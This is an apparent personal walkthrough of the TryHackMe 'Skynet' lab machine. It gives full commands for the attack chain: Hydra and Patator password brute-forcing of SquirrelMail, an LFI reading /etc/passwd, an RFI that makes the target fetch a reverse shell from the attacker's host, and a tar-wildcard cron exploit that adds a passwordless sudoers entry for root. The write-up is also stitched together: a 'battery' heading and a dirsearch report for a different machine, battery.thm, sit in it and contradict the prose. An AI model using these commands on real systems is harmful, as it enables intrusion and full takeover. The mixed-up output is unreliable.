THM: Skynet
battery
A vulnerable Terminator themed Linux machine.
This is Skynet from THM. It’s easy rated, subscriber only and part of the ‘Offensive Pentesting’ learning path. I’ve decided to subscribe; I’ll just try one month at this stage and see if I like it.
Ports
We’ve got a few ports:
PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 139/tcp open netbios-ssn
- 143/tcp open imap
- 445/tcp open microsoft-ds
SMB
We can see there are a couple of shares; particularly anonymous and milesdyson. The milesdyson share requires credentials, whereas the anonymous one (duh) does not. In there we get a message about passwords needing to be changed, signed by Miles Dyson. There are also three ‘log’ files; two are empty and the other one contains what looks like a list of passwords.
HTTP
The front page is a search box that doesn’t appear to do anything, and we’ve got no robots.txt.
Dirsearch finds a few things we don’t have access to (particularly admin and config), but also something we do: squirrelmail. This is a webmail client with a login page.
root@kali:/opt/tryhackme/battery# cat /opt/dirsearch/reports/battery.thm/_21-01-15_20-41-52.txt
200 663B http://battery.thm:80/admin.php
302 908B http://battery.thm:80/dashboard.php -> REDIRECTS TO: admin.php
200 2KB http://battery.thm:80/forms.php
200 406B http://battery.thm:80/index.html
302 0B http://battery.thm:80/logout.php -> REDIRECTS TO: admin.php
200 715B http://battery.thm:80/register.php
200 17KB http://battery.thm:80/report
301 311B http://battery.thm:80/scripts -> REDIRECTS TO: http://battery.thm/scripts/
200 2KB http://battery.thm:80/scripts/
403 292B http://battery.thm:80/server-status/
While searchsploit does have entries for squirrelmail, there are none for this version. So we need to break in.
Hydra
I’ve used Hydra in the past to bruteforce login pages but it did have a little trouble with this. The error message given by the webapp for an incorrect login attempt was:
ERROR
Unknown user or password incorrect.
Go to the login page
After some trial and error, I found that Hydra responded correctly (i.e. correctly identified the user:pass combination) if the error message was Unknown user or password incorrect or some part thereof, but NOT if the error message was specified as ERROR or Go to the login page. So, for example:
hydra -l milesdyson -P log1.txt 10.10.158.183 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown"
This worked, but this (below) did not:
hydra -l milesdyson -P log1.txt 10.10.158.183 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=ERROR"
This is fairly unsatisfactory, since not finding anything is a completely valid result; but we can’t tell if a null result is due to a problem parsing the page response OR if we don’t have a valid credential combination.
Medusa
As an experiment, I tried Medusa instead to see if it behaved any better. But it didn’t seem to work at all.
Patator
After some more research I decided to try patator, about which the creator says: Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks.
Anyway, it seemed to work very well indeed and successfully grepped the response for the error messages like I would have thought Hydra should have, so it will now be my go to:
patator http_fuzz url=http://10.10.204.243/squirrelmail/src/redirect.php method=POST body='login_username=FILE0&secretkey=FILE1&js_autodetect_results=1&just_logged_in=1' 0=./username 1=./log1.txt accept_cookie=1 -x ignore:fgrep='ERROR'
Webmail
The point of this exercise was to get us into Miles’s webmail, where we found his SMB password. With that we can login to his share and retrieve some information:
root@kali:/opt/tryhackme/skynet# python3 /usr/share/doc/python3-impacket/examples/smbclient.py milesdyson:')s{A&2Z=F^n_E.B`'@10.10.204.243
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# use milesdyson
# get important.txt
root@kali:/opt/tryhackme/skynet# cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wifeSo now we have a hidden directory to investigate.
Hidden directory
In the hidden directory under the /administrator subdirectory we find Cuppa CMS. There is a login page but checking searchsploit shows we don’t need to login, since we have an unauthenticated LFI/RFI vulnerability:
http://10.10.204.243/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
I host the PentestMonkey PHP reverse shell on my box and use the RFI:
http://10.10.204.243/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.10.123/shell.php
root@kali:/opt/tryhackme/skynet# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.204.243 - - [22/Jan/2021 04:57:32] "GET /shell.php HTTP/1.0" 200 - And with a separate listener, we are on the box.
Privesc
We are on as www-data but we can read the user flag from /home/milesdyson. We can also su to miles with the password we found earlier for his webmail, but we don’t need to. We have a root cronjob with a TAR wildcard to take advantage of:
milesdyson@skynet:~/backups$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
www-data@skynet:/var/www/html$ touch -- --checkpoint=1
touch -- --checkpoint=1
www-data@skynet:/var/www/html$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > pwn.sh
<ml$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > pwn.sh
www-data@skynet:/var/www/html$ touch -- "--checkpoint-action=exec=sh pwn.sh"
touch -- "--checkpoint-action=exec=sh pwn.sh"
www-data@skynet:/var/www/html$ date
date
Fri Jan 22 04:15:04 CST 2021
www-data@skynet:/var/www/html$ sudo su
sudo su
root@skynet:/var/www/html# cd /root
cd /root
root@skynet:~# cat root.txt
cat root.txt
# ROOT FLAG HERE
root@skynet:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
skynet